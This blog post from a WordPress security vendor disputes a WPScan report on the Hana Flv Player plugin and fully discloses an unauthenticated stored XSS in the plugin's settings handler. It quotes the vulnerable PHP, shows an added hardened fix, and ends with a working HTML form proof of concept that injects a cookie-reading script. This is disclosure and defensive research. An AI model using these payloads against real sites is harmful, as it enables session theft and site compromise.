21 Jun 2021

WPScan Misses Real Serious Vulnerability in WordPress Plugin Hana Flv Player While Spreading False Claim of Vulnerability

Recently one of our competitors in the WordPress plugin vulnerability space, WPScan, released a report claiming there was an authenticated stored cross-site scripting (XSS) vulnerability in the plugin Hana Flv Player. At first glance it looked like one of the many false reports they include in their data, but further checking showed that while the claimed vulnerability didn’t exist, there really was an even more serious vulnerability in the relevant code. As of our posting this, the plugin is still available in WordPress’ plugin directory despite that.

Their report of an “authenticated stored cross-site scripting (XSS) vulnerability” starts with this past tense claim:

The plugin was vulnerable to an Authenticated Stored Cross-Site Scripting (XSS) vulnerability within the “Default Skin” field.

Though confusingly they then claim there is “[n]o known fix”. So was it vulnerable, or is it still vulnerable?

The only other detail provided about the supposed vulnerability is this proof of concept:

Step1: Install and activate the plugin.

Step2: Go to the plugin setting.

Step3: Enter the following payload in the field “Default Skin”

xss”></td></tr></table><script>alert(1)</script><input type=’text’ name=”hflv_skin” value=”xss

Step4: Now the script is stored and whenever the user goes to the plugin the script will be executed.

What is being described there is a common scenario with false reports of vulnerabilities, as you have people who don’t understand the WordPress security model and don’t understand that high-level users have the capability to do the equivalent XSS. WPScan should understand that, but this report would say otherwise. WPScan claimed to have verified this.

You can easily check and see that the plugin’s settings page is only accessible to Administrators, who have that capability, so what is being described isn’t a vulnerability. Checking the underlying code confirms this, as only users with the manage_options capability, which only Administrators have, can access the page:

if ( $wp_version < 2 ) $capability=8; else $capability='manage_options';
add_options_page($this->admin_setting_title,$this->admin_setting_menu, $capability, __FILE__,array(&$this,'hana_flv_options_page'));

There could still be a different, less serious vulnerability there, if the plugin doesn’t properly protect against cross-site request forgery (CSRF) when saving the plugin’s settings. In this situation it was easy to confirm that was the case, but looking at the underlying code, it gets worse, as you don’t even have to be logged in to WordPress to save the plugin’s settings, which, combined with what you can change, is a persistent cross-site scripting (XSS) vulnerability. That is something that hackers would be much more likely to be exploiting than the vulnerability WPScan claimed existed.

In the plugin’s main file, the function hana_flv_options_update() will run if the POST input “hflv_player” is sent with a request to the website when the plugin is active:

if ( isset($_POST['hflv_player']) ) {
	$hana_flv->hana_flv_options_update();
}

That function saves the plugin’s settings without doing any security checks:

function hana_flv_options_update(){
 
	if ( isset($_POST['hflv_player']) ) {
		if ( is_numeric($_POST['hflv_player']) ){
			$this->user_attr['player'] = $_POST['hflv_player'];
		}
	}
 
	if ( isset($_POST['hflv_width']) ) {
		if ( is_numeric($_POST['hflv_width']) )
			$this->user_attr['width'] = $_POST['hflv_width'];
	}
 
	if ( isset($_POST['hflv_height']) ) {
		if ( $_POST['hflv_height']=='' || is_numeric($_POST['hflv_height']) || $_POST['hflv_height']=='auto' || $_POST['hflv_height']=='autow' )
			$this->user_attr['height'] = $_POST['hflv_height'];
	}
 
	if ( isset($_POST['hflv_autoplay']) ) {
		if ($_POST['hflv_autoplay'] =='true' || $_POST['hflv_autoplay'] =='false' )
			$this->user_attr['autoplay'] = $_POST['hflv_autoplay'];
	}
 
	if ( isset($_POST['hflv_loop']) ) {
		if ($_POST['hflv_loop'] =='true' || $_POST['hflv_loop'] =='false' )
			$this->user_attr['loop'] = $_POST['hflv_loop'];
	}
 
	if ( isset($_POST['hflv_autorewind']) ) {
		if ($_POST['hflv_autorewind'] =='true' || $_POST['hflv_autorewind'] =='false' )
			$this->user_attr['autorewind'] = $_POST['hflv_autorewind'];
	}
 
	if ( isset($_POST['hflv_autoload']) ) {
		if ($_POST['hflv_autoload'] =='true' || $_POST['hflv_autoload'] =='false' )
			$this->user_attr['autoload'] = $_POST['hflv_autoload'];
	}
	if ( isset($_POST['hflv_event_tracking']) ) {
		if ($_POST['hflv_event_tracking'] =='yes' || $_POST[hflv_event_tracking] =='no' )
			$this->user_attr['event_tracking'] = $_POST['hflv_event_tracking'];
	}
 
	if ( isset($_POST['hflv_more_2']) ) {			
			$this->user_attr['more_2'] = str_replace("\\",'',$_POST['hflv_more_2']);
	}
	if ( isset($_POST['hflv_more_3']) ) {
			$this->user_attr['more_3'] = str_replace("\\",'',$_POST['hflv_more_3']);
	}
	if ( isset($_POST['hflv_more_4']) ) {
			$this->user_attr['more_4'] = str_replace("\\",'',$_POST['hflv_more_4']);
	}
 
	if ( isset($_POST['hflv_more_4']) ) {
			$this->user_attr['flow3key'] = str_replace("\\",'',$_POST['flow3key']);
	}
	if ( isset($_POST['hflv_more_5']) ) {
			$this->user_attr['more_5'] = str_replace("\\",'',$_POST['hflv_more_5']);
	}
	if ( isset($_POST['hflv_skin']) ) {
			$this->user_attr['skin'] = str_replace("\\",'',$_POST['hflv_skin']);
	}
 
	//print_r ($this->user_attr);
 
	update_option('hanaflv_options',$this->user_attr);
	//$this->user_attr = get_option('hanaflv_options');
 
	$this->update_result="Settings are updated";
 
}

Because of a lack of sanitization, validation, and/or escaping, JavaScript could be set in the settings and then run, as confirmed with the proof of concept below.
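For comparison, here is how the save path described above would look with the missing checks in place. This is an added example, not the plugin’s own code: the option name and the hflv_player/hflv_skin field names come from the code above, while the nonce action name hana_flv_save_options and the hardened function names are assumptions.

```php
<?php
// Added example (not from the plugin): a hardened version of the settings
// save path. The nonce action 'hana_flv_save_options' is an assumed name.

// The original code saves settings for any request carrying hflv_player,
// including anonymous ones. Here the save only runs from the admin area
// (admin_init), for an Administrator, with a valid nonce, so neither an
// anonymous POST nor a CSRF request from a victim's browser can change them.
add_action( 'admin_init', function () {
    if ( isset( $_POST['hflv_player'] ) ) {
        hana_flv_options_update_hardened();
    }
} );

function hana_flv_options_update_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 403 );
    }
    // Dies unless the form included wp_nonce_field( 'hana_flv_save_options' ).
    check_admin_referer( 'hana_flv_save_options' );

    $options = (array) get_option( 'hanaflv_options', array() );

    // Numeric setting: cast the value instead of storing the raw string.
    if ( isset( $_POST['hflv_player'] ) && is_numeric( $_POST['hflv_player'] ) ) {
        $options['player'] = (int) $_POST['hflv_player'];
    }

    // Free-text setting that is later printed into an HTML attribute: the
    // original only stripped backslashes; sanitize_text_field removes tags,
    // control characters and surrounding whitespace.
    if ( isset( $_POST['hflv_skin'] ) ) {
        $options['skin'] = sanitize_text_field( wp_unslash( $_POST['hflv_skin'] ) );
    }

    update_option( 'hanaflv_options', $options );
}

// Output side: escaping at the point of use is the second line of defence, so
// even a value stored before the fix cannot break out of the value attribute.
function hana_flv_render_skin_field( array $options ) {
    $skin = isset( $options['skin'] ) ? $options['skin'] : '';
    return sprintf(
        '<input type="text" name="hflv_skin" value="%s" />',
        esc_attr( $skin )
    );
}
```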

Patchstack Too

Not to be left out, another data provider, Patchstack, which looks to include WPScan’s data without doing proper due diligence, also included the fake vulnerability claim in their data.

WordPress Causes Full Disclosure

Because of the moderators of the WordPress Support Forum’s continued inappropriate behavior we changed from reasonably disclosing to full disclosing vulnerabilities for plugins in the WordPress Plugin Directory in protest, until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.) You can notify the developer of this issue on the forum as well. Hopefully, the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions of installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Is It Fixed?

If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.

Proof of Concept

The following proof of concept will cause any available cookies to be shown in an alert box on the page /wp-admin/options-general.php?page=hana-flv-player%2Fhana-flv-player.php.

Replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/" method="POST">
<input type="hidden" name="hflv_player" value="1" />
<input type="hidden" name="hflv_skin" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.
